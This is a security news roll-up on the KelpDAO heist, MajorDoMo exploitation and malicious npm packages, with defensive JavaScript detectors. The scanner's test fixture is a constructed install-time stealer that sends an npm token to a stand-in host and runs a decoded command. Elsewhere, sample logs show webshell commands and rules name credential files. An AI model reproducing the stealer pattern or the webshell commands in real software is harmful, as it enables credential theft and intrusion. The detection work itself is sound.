Full Report
You scroll past one incident and see another that feels familiar, like it should have been fixed years ago, yet it still works with small changes. Same bugs. Same mistakes. The supply chain is messy: packages nobody vetted are stealing data, planting backdoors, and spreading. Attacking the systems behind apps is easier than breaking the apps themselves. The exploits are simple, and they still work.
Analysis Summary
# Morning News Roll-up 2026-04-23
## Overview
This report covers a set of persistent, recurring security failures across DeFi infrastructure, home automation systems, and the software supply chain. Key incidents: a $290M crypto heist attributed to North Korea, active exploitation of two MajorDoMo smart home platform vulnerabilities, and a surge in malicious npm packages.
## Top Stories
### North Korea Linked to $290M KelpDAO Crypto Heist
- Summary: Threat actors tracked as TraderTraitor (attributed to North Korea) reportedly compromised LayerZero infrastructure to drain $290 million from the KelpDAO DeFi project. The attackers poisoned the RPC infrastructure that verified transactions and ran a simultaneous DDoS against the legitimate verification nodes, leaving the transaction guards dependent on nodes under attacker control.
- Source: hxxps://thehackernews[.]com/2026/04/threatsday-bulletin-290m-defi-hack[.]html
### Active RCE Exploitation of MajorDoMo Smart Home Platforms
- Summary: Attackers are actively exploiting two vulnerabilities in the MajorDoMo home automation platform, CVE-2026-27175 and CVE-2026-27174. The exploits involve command injection (CVE-2026-27175) and unauthenticated remote code execution, and have been used to drop PHP webshells and Metasploit (Meterpreter) payloads.
- Source: hxxps://nvd[.]nist[.]gov/vuln/detail/CVE-2026-27175
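The webshell stage of the MajorDoMo exploitation is the part a defender can see in ordinary web server logs even before the platform is patched. The detector below is an added example, not code from the NVD entry or from any vendor: it parses a few constructed Apache combined-format lines and flags PHP requests served from directories that should only hold data, plus requests carrying shell-style query parameters, then groups hits by source address. The IPs, paths and log lines are constructed and do not reflect MajorDoMo's real layout; the directory list, parameter list and the two-hit threshold are assumptions to tune per site.

```javascript
// Added example: flag PHP webshell activity in Apache combined-format logs.
// The log lines, IPs and paths are constructed and are not MajorDoMo's
// real layout; NO_CODE_DIRS and CMD_PARAMS are assumptions to tune per site.

const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) \S+" (\d{3}) \S+/;

// Directories that should only ever hold data, never executable PHP.
const NO_CODE_DIRS = ["/uploads/", "/cache/", "/tmp/", "/backup/"];
// Query parameters that typically carry a shell command to a webshell.
const CMD_PARAMS = new Set(["cmd", "exec", "command", "shell", "system"]);

// Constructed sample: one benign browser session and one operator working a
// freshly dropped shell at /uploads/cache_x.php.
const SAMPLE_LOG = [
  '10.0.0.5 - - [23/Apr/2026:08:12:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  '203.0.113.9 - - [23/Apr/2026:08:14:33 +0000] "POST /uploads/cache_x.php HTTP/1.1" 200 231 "-" "python-requests/2.31"',
  '203.0.113.9 - - [23/Apr/2026:08:14:35 +0000] "GET /uploads/cache_x.php?cmd=id HTTP/1.1" 200 88 "-" "python-requests/2.31"',
  '10.0.0.5 - - [23/Apr/2026:08:15:10 +0000] "GET /panel/devices.php?id=7 HTTP/1.1" 200 4201 "-" "Mozilla/5.0"',
  '203.0.113.9 - - [23/Apr/2026:08:16:02 +0000] "GET /uploads/cache_x.php?cmd=uname%20-a HTTP/1.1" 200 140 "-" "python-requests/2.31"',
].join("\n");

// Parse one combined-format line into the fields the rules need; null if unparseable.
function parseLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  const [, ip, time, method, target, status] = m;
  // The base URL is only there so a relative request target parses.
  const url = new URL(target, "http://placeholder.invalid");
  return { ip, time, method, path: url.pathname, params: url.searchParams, status: Number(status) };
}

// Reasons a single request looks like webshell traffic (empty array if none).
function classify(req) {
  const reasons = [];
  const isPhp = /\.php\d?$/i.test(req.path);
  if (isPhp && NO_CODE_DIRS.some((dir) => req.path.startsWith(dir))) {
    reasons.push("php executed from data directory");
  }
  for (const key of req.params.keys()) {
    if (CMD_PARAMS.has(key.toLowerCase())) reasons.push(`command-style parameter "${key}"`);
  }
  return reasons;
}

// Run the rules over a whole log and group hits by source address.
function analyze(logText) {
  const flagged = [];
  const hitsByIp = new Map();
  for (const line of logText.split("\n")) {
    const req = parseLine(line);
    if (!req) continue;
    const reasons = classify(req);
    if (reasons.length === 0) continue;
    flagged.push({ ip: req.ip, time: req.time, method: req.method, path: req.path, reasons });
    hitsByIp.set(req.ip, (hitsByIp.get(req.ip) || 0) + 1);
  }
  // Two or more flagged requests from one address is the triage threshold (assumption).
  const suspiciousIps = [...hitsByIp].filter(([, n]) => n >= 2).map(([ip]) => ip);
  return { flagged, suspiciousIps };
}

console.log(JSON.stringify(analyze(SAMPLE_LOG), null, 2));
```

Log rules only see the operator's traffic; pair them with file-integrity monitoring on the same directories so the drop itself (a new .php file appearing under an upload or cache path) raises an alert even when the operator never sends a recognisable parameter name.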
### Malicious npm Packages Targeting Supply Chains
- Summary: A surge of malicious packages has been detected in the npm registry, built for credential theft, remote access (RATs), and dependency confusion. Notable packages include ixpresso-core (a RAT), forge-jsx, and the @fairwords suite, which behave as credential worms (malware that harvests credentials and uses them to spread further).
- Source: hxxps://safedep[.]io/malicious-ixpresso-core-npm-rat/
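Dependency confusion, one of the techniques in the npm story above, works because a build resolves an internal package name from whichever registry offers it, and the public registry wins when it offers a higher version. The audit below is an added example and not code from any of the cited sources: it reads an npm lockfile and, for every package on an internal allowlist, checks that the `resolved` URL points at the private registry, that the declared range is not a wildcard, and that the name is scoped (an unscoped internal name cannot be bound to one registry in `.npmrc`). The private registry host, the package names and the embedded lockfile are constructed for the illustration.

```javascript
// Added example: audit an npm lockfile for dependency-confusion exposure.
// The private registry host, the internal package names and the lockfile
// content are assumptions constructed for this illustration.

const PRIVATE_REGISTRY = "npm.internal.example";
const INTERNAL_PACKAGES = new Set(["@acme/auth-client", "acme-config-loader"]);

// Constructed package-lock.json (lockfileVersion 3). "acme-config-loader" is
// declared with an unpinned range and has been resolved from the public
// registry at a version that does not exist internally.
const SAMPLE_LOCKFILE = JSON.stringify({
  name: "demo-app",
  lockfileVersion: 3,
  packages: {
    "": {
      name: "demo-app",
      dependencies: { "@acme/auth-client": "^2.4.0", "acme-config-loader": "*", lodash: "^4.17.21" },
    },
    "node_modules/@acme/auth-client": {
      version: "2.4.1",
      resolved: "https://npm.internal.example/@acme/auth-client/-/auth-client-2.4.1.tgz",
    },
    "node_modules/acme-config-loader": {
      version: "99.0.0",
      resolved: "https://registry.npmjs.org/acme-config-loader/-/acme-config-loader-99.0.0.tgz",
    },
    "node_modules/lodash": {
      version: "4.17.21",
      resolved: "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz",
    },
  },
});

// "node_modules/a/node_modules/@s/b" -> "@s/b": the package name is whatever
// follows the last "node_modules/" segment of the lockfile key.
function packageNameFromPath(lockPath) {
  const marker = "node_modules/";
  const idx = lockPath.lastIndexOf(marker);
  return idx === -1 ? null : lockPath.slice(idx + marker.length);
}

// Host part of a resolved tarball URL, or null when it is not a URL at all.
function registryHost(resolved) {
  try { return new URL(resolved).host; } catch { return null; }
}

// One finding per problem; an empty array means every internal package was
// fetched from the private registry under a pinned, scoped name.
function auditLockfile(lockfileText, internalPackages, privateRegistry) {
  const lock = JSON.parse(lockfileText);
  const packages = lock.packages || {};
  const declared = (packages[""] && packages[""].dependencies) || {};
  const findings = [];
  for (const [lockPath, entry] of Object.entries(packages)) {
    const name = packageNameFromPath(lockPath);
    if (!name || !internalPackages.has(name)) continue;
    const host = registryHost(entry.resolved);
    if (host !== privateRegistry) {
      findings.push({ name, version: entry.version, reason: `resolved from ${host || "unknown host"} instead of ${privateRegistry}` });
    }
    if (declared[name] === "*" || declared[name] === "latest") {
      findings.push({ name, version: entry.version, reason: `unpinned range "${declared[name]}" lets a higher public version win` });
    }
    if (!name.startsWith("@")) {
      findings.push({ name, version: entry.version, reason: "unscoped name cannot be bound to the private registry in .npmrc" });
    }
  }
  return findings;
}

console.log(auditLockfile(SAMPLE_LOCKFILE, INTERNAL_PACKAGES, PRIVATE_REGISTRY));
```

The structural fix behind the third check is to publish internal packages under a scope you own and bind that scope in `.npmrc` (`@acme:registry=https://npm.internal.example/` in this example's naming); npm then never consults the public registry for those names, whatever version it might offer.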
---
# Persistent Supply Chain and Infrastructure Exploitation
The current threat landscape is dominated by familiar vulnerabilities: simple bugs and supply chain mistakes that remain effective despite being well known. Attackers are increasingly targeting the infrastructure behind applications rather than the applications themselves, using automated tools and malicious packages to plant backdoors and steal data.
## Key Points
- **Infrastructure Over Application:** Attackers favor compromising the "systems behind the apps" (such as RPC nodes or dependency trees) rather than breaking the application security layers directly.
- **Supply Chain Fragility:** A significant number of npm packages are being utilized to spread backdoors and steal credentials, exploiting the lack of vetting in third-party dependencies.
- **Smart Home Vulnerability:** Mature automation platforms like MajorDoMo are facing active exploitation through unauthenticated RCE, leading to full system compromise via Meterpreter payloads.
- **DeFi Guard Manipulation:** The KelpDAO heist demonstrates that even decentralized protocols are vulnerable if the underlying infrastructure (RPC nodes) can be poisoned or overwhelmed by DDoS.
## Threat Actors
- **TraderTraitor / Lazarus Group:** State-sponsored threat actors from North Korea; motivated by financial gain to fund state activities. Associated with the $1.5B Bybit hack and the Drift Protocol theft.
- **Various Unattributed Actors:** Utilizing automated scanners to find and exploit MajorDoMo flaws and deploying malicious npm packages for credential harvesting.
## TTPs
- **RPC Poisoning:** Manipulating the downstream RPC infrastructure a guard relies on so that fraudulent transactions pass verification.
- **Living-off-the-Land (LotL):** Abusing legitimate system tools to stay stealthy (raised by the source bulletin in a macOS context, separate from the three stories above).
- **Dependency Confusion:** Registering internal package names on public registries to trick build systems into downloading malicious code.
- **DDoS as a Distraction:** Using volumetric attacks to disable legitimate verification nodes while compromised nodes approve malicious actions.
- **Webshell Deployment:** Using command injection (CVE-2026-27175) to drop PHP-based persistent backdoors.
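RPC poisoning and DDoS-as-distraction only pay off together against a guard that accepts "agreement of whoever answered": knock the honest nodes offline and the poisoned node is a majority of one. The guard below is an added illustration, not code from LayerZero, KelpDAO or the cited bulletin. It asks every configured RPC endpoint for the same transaction receipt and accepts only when a fixed M of the N configured endpoints return the same receipt, so endpoints silenced by a DDoS are missing votes rather than a smaller denominator. The endpoint names, the receipts and the transaction hash are constructed; the simulated endpoints are synchronous for clarity where a real guard would issue concurrent calls with per-call timeouts.

```javascript
// Added example: a transaction-verification guard that needs M of the N
// configured RPC endpoints to agree. Endpoints, receipts and the tx hash are
// constructed; none of this is LayerZero's or KelpDAO's code.

const TX_HASH = "0xdemo";
const HONEST_RECEIPT = { status: "0x1", blockHash: "0x1111", logCount: 2 };
const FORGED_RECEIPT = { status: "0x1", blockHash: "0x9999", logCount: 5 };

// Simulated endpoint: "honest" and "poisoned" answer, "timeout" throws, which
// is what a node knocked over by a volumetric DDoS looks like to the guard.
function makeEndpoint(name, behaviour) {
  return {
    name,
    getReceipt() {
      if (behaviour === "timeout") throw new Error(`${name}: timeout`);
      return behaviour === "poisoned" ? FORGED_RECEIPT : HONEST_RECEIPT;
    },
  };
}

// Canonical string so receipts compare by content, not object identity.
function fingerprint(receipt) {
  return JSON.stringify(receipt, Object.keys(receipt).sort());
}

// Tally answers; silent endpoints contribute nothing. A production version
// runs the calls concurrently with a per-call timeout; the tally is the same.
function collectVotes(endpoints, txHash) {
  const votes = new Map();
  let answered = 0;
  for (const ep of endpoints) {
    let receipt;
    try { receipt = ep.getReceipt(txHash); } catch { continue; }
    answered += 1;
    const key = fingerprint(receipt);
    const entry = votes.get(key) || { count: 0, receipt };
    entry.count += 1;
    votes.set(key, entry);
  }
  const leader = [...votes.values()].sort((a, b) => b.count - a.count)[0] || null;
  return { leader, answered };
}

// Weak guard: majority of whoever answered. With the honest nodes DDoSed
// offline, one poisoned node is a majority of one. Returns the accepted receipt.
function weakVerify(endpoints, txHash) {
  const { leader, answered } = collectVotes(endpoints, txHash);
  return leader && leader.count * 2 > answered ? leader.receipt : null;
}

// Hardened guard: at least m of the configured endpoints must agree; nodes that
// did not answer are missing votes, not excused ones. Pick m > N/2 so two
// conflicting receipts can never both reach quorum.
function quorumVerify(endpoints, txHash, m) {
  const { leader } = collectVotes(endpoints, txHash);
  return leader && leader.count >= m ? leader.receipt : null;
}

// Five configured endpoints, one poisoned, the four honest ones under DDoS.
function ddosScenario() {
  return [
    makeEndpoint("rpc-a", "timeout"),
    makeEndpoint("rpc-b", "timeout"),
    makeEndpoint("rpc-c", "timeout"),
    makeEndpoint("rpc-d", "timeout"),
    makeEndpoint("rpc-e", "poisoned"),
  ];
}

// The same fleet on a normal day: the poisoned node is simply outvoted.
function healthyScenario() {
  return [
    makeEndpoint("rpc-a", "honest"),
    makeEndpoint("rpc-b", "honest"),
    makeEndpoint("rpc-c", "honest"),
    makeEndpoint("rpc-d", "honest"),
    makeEndpoint("rpc-e", "poisoned"),
  ];
}

console.log("weak guard under DDoS accepts:", weakVerify(ddosScenario(), TX_HASH));
console.log("3-of-5 guard under DDoS accepts:", quorumVerify(ddosScenario(), TX_HASH, 3));
```

The price of the hardened guard is availability: with M fixed, a DDoS that silences more than N - M endpoints stalls verification instead of corrupting it. That is the intended failure mode, and it is why the endpoints have to sit with operationally and geographically independent providers, so that one attack cannot silence M of them at once.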
## Affected Systems
- **DeFi Protocols:** KelpDAO and LayerZero infrastructure.
- **Smart Home Platforms:** MajorDoMo (specifically CVE-2026-27174 and CVE-2026-27175).
- **Software Development Ecosystems:** npm registry users (Node.js environments).
- **Networking Hardware:** NETGEAR DGN2200 routers (CVE-2024-57046).
- **Web Applications:** Systems utilizing Elestio Memos (CVE-2025-22952).
## Mitigations
- **Infrastructure Redundancy:** Do not run cross-chain verification on default settings. Draw RPC nodes from geographically and operationally independent operators, require a fixed quorum of the configured set, and count nodes silenced by a DDoS as missing votes rather than shrinking the quorum to whoever still answers.
- **Dependency Vetting:** Automate scanning of npm packages (for example with tools such as SafeDep) for known malicious signatures and unusual behaviour such as install-time scripts, and bind internal package names to the private registry so public look-alikes cannot win resolution.
- **Patch Management:** Immediately update MajorDoMo installations and NETGEAR firmware to address known RCE and authentication bypass vulnerabilities.
- **Network Segmentation:** Isolate IoT and smart home automation systems from production and personal data networks, so that a PHP webshell on an automation host cannot reach anything beyond that host.
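For the dependency-vetting mitigation, a first pass that needs no vendor feed is to score the traits the RAT and credential-stealer packages in the npm story share: an install-time lifecycle script, and code that spawns processes, reads secrets from the environment, decodes hidden payloads and sends data out. The scanner below is an added example and is not SafeDep's tooling or any cited source's code; it runs over a constructed package manifest and file map and over a constructed benign control. The rules, weights, thresholds and sample packages are assumptions.

```javascript
// Added example: heuristic scoring of an npm package before install.
// Sample manifests, files, rules and thresholds are constructed assumptions;
// this is not SafeDep's scanner or any cited source's code.

// Each rule: label, pattern matched against a file's source text, weight.
const RULES = [
  ["spawns a process", /\brequire\(["'](?:node:)?child_process["']\)|\b(?:exec|spawn)(?:Sync)?\(/, 3],
  ["reads env or credential files", /process\.env\b|\.npmrc|\.aws\/credentials|id_rsa/, 2],
  ["opens outbound network", /\b(?:https?|net)\.(?:request|get|connect)\(|\bfetch\(/, 2],
  ["decodes or evals hidden code", /Buffer\.from\([^)]*["']base64["']\)|\batob\(|\beval\(|new Function\(/, 2],
];
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];
const LIFECYCLE_WEIGHT = 3;
const THRESHOLDS = { block: 6, review: 3 };

// Constructed sample in the install-time stealer shape: a postinstall hook
// that reads a token, decodes a command and ships the token to a remote host.
const SUSPECT_PACKAGE = { name: "demo-utils", version: "1.0.3", scripts: { postinstall: "node setup.js" } };
const SUSPECT_FILES = {
  "index.js": "module.exports = { version: '1.0.3' };",
  "setup.js": [
    "const cp = require('child_process');",
    "const https = require('https');",
    "const token = process.env.NPM_TOKEN;",
    "const cmd = Buffer.from('aWQ=', 'base64').toString(); // decodes to: id",
    "https.request({ host: 'example.invalid', method: 'POST' }).end(token);",
    "cp.exec(cmd);",
  ].join("\n"),
};

// Constructed benign control: no hooks, no risky calls.
const BENIGN_PACKAGE = { name: "left-trim", version: "0.1.0" };
const BENIGN_FILES = { "index.js": "module.exports = (s) => s.replace(/^\\s+/, '');" };

// Score a package from its manifest and a map of file name -> source text.
function scanPackage(pkg, files) {
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    if (pkg.scripts && pkg.scripts[hook]) {
      findings.push({ file: "package.json", label: `install-time hook "${hook}": ${pkg.scripts[hook]}`, weight: LIFECYCLE_WEIGHT });
    }
  }
  for (const [file, source] of Object.entries(files)) {
    for (const [label, pattern, weight] of RULES) {
      if (pattern.test(source)) findings.push({ file, label, weight });
    }
  }
  const score = findings.reduce((sum, f) => sum + f.weight, 0);
  const verdict = score >= THRESHOLDS.block ? "block" : score >= THRESHOLDS.review ? "review" : "allow";
  return { name: pkg.name, score, verdict, findings };
}

console.log(scanPackage(SUSPECT_PACKAGE, SUSPECT_FILES));
console.log(scanPackage(BENIGN_PACKAGE, BENIGN_FILES));
```

Native-module packages legitimately use postinstall for builds, so "review" is a triage queue, not a verdict. Whatever the score, set `ignore-scripts=true` in the CI `.npmrc` so no lifecycle hook runs at install time; the packages that need hooks can then be built deliberately.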
## Conclusion
The recurring nature of these exploits suggests that many organizations are failing at security fundamentals. The shift toward infrastructure-level attacks and supply chain poisoning requires a move away from simple perimeter defense toward continuous verification of dependencies and the hardening of the underlying systems that support decentralized and automated applications. Aggressive patching and the use of threat intelligence to identify malicious library patterns are essential.